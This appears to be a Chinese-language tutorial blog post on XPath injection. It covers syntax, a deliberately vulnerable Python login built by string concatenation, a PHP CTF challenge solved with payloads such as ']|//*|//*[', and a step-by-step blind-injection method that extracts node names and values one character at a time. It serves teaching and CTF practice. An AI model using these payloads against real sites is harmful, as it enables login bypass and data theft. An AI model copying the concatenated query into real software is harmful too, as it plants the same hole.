浅谈Xpath注入漏洞
创始人
2024-05-31 21:29:44
0

目录

知识简介

攻击简介

基础语法

语法演示

漏洞简介

漏洞原理

漏洞复现

Xpath盲注


知识简介

攻击简介

XPath注入攻击是指利用XPath 解析器的松散输入和容错特性,能够在 URL、表单或其它信息上附带恶意的XPath 查询代码,以获得权限信息的访问权并更改这些信息。XPath注入发生在当站点使用用户输入的信息来构造请求以获取XML数据。攻击者对站点发送经过特殊构造的信息来探究站点使用的XML是如何构造的,从而进一步获取正常途径下无法获取的数据。当XML数据被用作账户验证时,攻击者还可以提升他的权限。

基础语法

“nodename” – 选取nodename的所有子节点
“/nodename” – 从根节点中选择
“//nodename” – 从当前节点选择
“..” – 选择当前节点的父节点
“child::node()” – 选择当前节点的所有子节点
"@" -选择属性
"//user[position()=2] " 选择节点位置

语法演示

from lxml import etree
xml ='''18male李四24female
'''
tree = etree.XML(xml)
out = tree.xpath('//students')[0][0][0][0].text
print(out)
print('-------------------------------------')
out = tree.xpath('//name')[1].text
print(out)
out = tree.xpath('//name')[1].xpath('@id')
print(out)


-------------------------------------
李四
['ls']

漏洞简介

漏洞原理

XPath 注入的原理与sql注入大体类似。主要是通过构建特殊的输入,这些输入往往是XPath语法中的一些组合,这些输入将作为参数传入Web 应用程序,通过执行XPath查询而执行入侵者想要的操作。但是,注入的对象不是数据库users表了,而是一个存储数据的XML文件。因为xpath不存在访问控制,所以我们不会遇到许多在SQL注入中经常遇到的访问限制。 注入出现的位置也就是cookieheadersrequest parameters/input

漏洞复现

  • 案例1
  • 正常网站存在如下登录代码
from lxml import etreexml ='''admin123456

'''
tree = etree.XML(xml)
username = input('请输入用户名')
password = input('请输入密码')
out = tree.xpath('/students/student[id/text()="'+username+'" and password/text()="'+password+'"]')
print('登录成功,欢迎您'+out[0][0].text)

正常登陆

不正常登录

" or "1"="1
/students/student[id/text()="admin" and password/text() = "" or "1"="1"]

  • 案例2

index.php

xpath($query);
foreach($ans as $x => $x_value)
{
echo $x.":  " . $x_value;
echo "
"; } } ?>

coleak.xml




user1
KEY:1
user2
KEY:2
user3
KEY:3
user4
KEY:4
user5
KEY:5
user6
KEY:6
user7
KEY:7
user8
KEY:8
user9
KEY:9


hctf
flag:hctf{Dd0g_fac3_t0_k3yboard233}

正常查询

测试 ?user='" 时出现报错,可以确定存在Xpath注入

-1' or 1=1 or ''='
$query="user/username[@name='-1' or 1=1 or ''='']";
1=1为真 ''='' 为真,则可以匹配当前节点下的所有user

']|//*|//*['
$query="user/username[@name='']|//*|//*['';
这里闭合了$user前后的单引号同时执行三个操作,其中第二个操作//*即是关键点,列出文档中的所有元素,最后拿到flag

Xpath盲注

xpath盲注适用于攻击者不清楚XML文档的架构,没有错误信息返回,一次只能通过布尔化查询来获取部分信息,同样以0x05中的源码为例

Xpath盲注步骤:

  • 判断根节点下的节点数
  • 判断根节点下节点长度&名称
  • .....
  • 重复猜解完所有节点,获取最后的值

从根节点开始判断

'or count(/)=1  or ''='     ###根节点数量为1
'or count(/*)=1 or ''='   ##根节点下只有一个子节点

判断根节点下的节点长度

'or string-length(name(/*[1]))=8 or ''='

猜解根节点下的节点名称

'or substring(name(/*[1]), 1, 1)='a'  or ''='
'or substring(name(/*[1]), 2, 1)='c'  or ''='
..
'or substring(name(/*[1]), 8, 1)='s'  or ''='

猜解出该节点名称为accounts

'or count(/accounts)=1  or ''='   /accounts节点数量为1
'or count(/accounts/user/*)>0 or ''='     /accounts下有两个节点
'or string-length(name(/accounts/*[1]))=4  or ''='    第一个子节点长度为4

猜解accounts下的节点名称

'or substring(name(/accounts/*[1]), 1, 1)='u'  or ''='
...
'or substring(name(/accounts/*[1]), 4, 1)='r'  or ''='

accounts下子节点名称为user

'or count(/accounts/user)=2  or ''='    user节点有两个,则可以猜测出accounts节点结构,accounts下两个节点,均为user节点

第一个user节点的子节点长度为8:
'or string-length(name(/accounts/user[position()=1]/*[1]))=8 or ''='

读取user节点的下子节点

'or substring(name(/accounts/user[position()=1]/*[1]), 1, 1)='u'  or ''='
'or substring(name(/accounts/user[position()=1]/*[1]), 2, 1)='s'  or ''='
...
'or substring(name(/accounts/user[position()=1]/*[1]), 8, 1)='e'  or ''='

最终所有子节点值验证如下:

'or substring(name(/accounts/user[position()=1]/*[1]), 1)='username'  or ''='
'or substring(name(/accounts/user[position()=1]/*[2]), 1)='email'  or ''='
'or substring(name(/accounts/user[position()=1]/*[3]), 1)='accounttype'  or ''='
'or substring(name(/accounts/user[position()=1]/*[4]), 1)='password'  or ''='

继续猜解:

'or count(/accounts/user[position()=1]/username/*)>0 or ''='   
'or count(/accounts/user[position()=1]/email/*)>0 or ''=' 
'or count(/accounts/user[position()=1]/accounttype/*)>0 or ''='
'or count(/accounts/user[position()=1]/username/password/*)>0 or ''='

均为 false,不再有子节点,则可以尝试读取这些节点的值

第一个user下的username值长度为6:

'or string-length((//user[position()=1]/username[position()=1]))=6  or ''='

读取第一个user下usernaem的值

'or substring((//user[position()=1]/username[position()=1]),1,1)='T'  or ''='
....
'or substring((//user[position()=1]/username[position()=1]),6,1)='e'  or ''='

可依次读取所有的子节点的值,第二user节点的子节点值读取方式:

'or string-length((//user[position()=2]/username[position()=1]))=4 or ''='  第一个user下的username长度为4
......

重复上边步骤即可

相关内容

热门资讯

美国国际开发署裁员1600人,... 美国政府23日宣布,自美国东部时间当天23时59分起,美国国际开发署在全球的“全部直接雇用人员”被安...
台股收跌0.7% 格隆汇2月24日|台湾加权指数收跌0.7%,报23565.31点。
小米马志宇:REDMI Boo... IT之家 2 月 24 日消息,小米首款 AI PC 产品 —— REDMI Book Pro 16...
家联科技跌2.01%,成交额2... 2月24日,家联科技盘中下跌2.01%,截至13:43,报16.57元/股,成交2401.34万元,...
博士女局长,被查 据贵州省纪委监委2月24日消息,贵州省大数据发展管理局原局长景亚萍涉嫌严重违纪违法,目前正接受纪律审...
提莫西·查拉梅爆冷摘得美国演员... 当地时间2月23日晚间,第31届美国演员工会奖(SAG)在洛杉矶举办颁奖典礼。作为奥斯卡颁奖典礼前最...
主动权益基金业绩回升 超120... 中证报中证网讯(记者 万宇)Wind数据显示,截至2月21日,中证800全收益和沪深300指数在过去...
包钢集团增资至167.7亿 天眼查App显示,近日,包头钢铁(集团)有限责任公司发生工商变更,原股东中国华融资产管理股份有限公司...
麦当劳肯德基隔空吵架!真正的商... 转自:贝壳财经打工人的一天伴随着诸多选择。尤其在吃什么这件事上,至少要想三次。麦当劳、肯德基这样的快...
假Pi币,崩溃! 2月20日,Pi网络主网上线,官方Pi币在交易所上市,短短几个小时后,pump.fun平台上产生的假...
Intuitive Machi... IT之家 2 月 24 日消息,Intuitive Machines 公司在去年凭借其“Odysse...
梅里雪山雨崩景区临时闭园:游览... 转自:澎湃新闻  2月24日,德钦美丽雪山国家公园开发经营有限公司在其官方公众号公告称,因德钦县境内...
Omdia:AI浪潮带来数据存... Omdia发文称,预计下一波人工智能(AI)浪潮将重点聚焦在AI代理部署和私人数据增强训练方面,这将...
生态环境部:承办全国两会建议提... 转自:北京青年报客户端2月24日,生态环境部召开2月例行新闻发布会。生态环境部新闻发言人裴晓菲介绍,...
小行星撞地球概率调整为接近为零 据央视《朝闻天下》报道,目前,根据美国航空航天局最新的天文观测结果,小行星“2024 YR4”撞击地...
T+0算法涌现!券商业绩新抓手...   炒股就看金麒麟分析师研报,权威,专业,及时,全面,助您挖掘潜力主题机会! 2月24日,A股震荡...
青海召开工会重点工作创新案例推... 转自:中工网原标题:青海召开工会重点工作创新案例推进会工人日报-中工网记者 邢生祥2月20日,青海工...
为AI热再添一把火,第三届世界... 转自:上观新闻近日,AI热在各领域兴起。科学突破也为通用人工智能(AGI)的探索提供了强劲动力,科学...
丸美生物涨2.03%,成交额2... 2月24日,丸美生物盘中上涨2.03%,截至13:44,报30.64元/股,成交2714.31万元,...
换一换主食,全身炎症水平都降低... 转自:上观新闻在很多重大疾病发展的过程中,“炎症反应”是重要一环,涉及心脑血管疾病、癌症等。慢性炎症...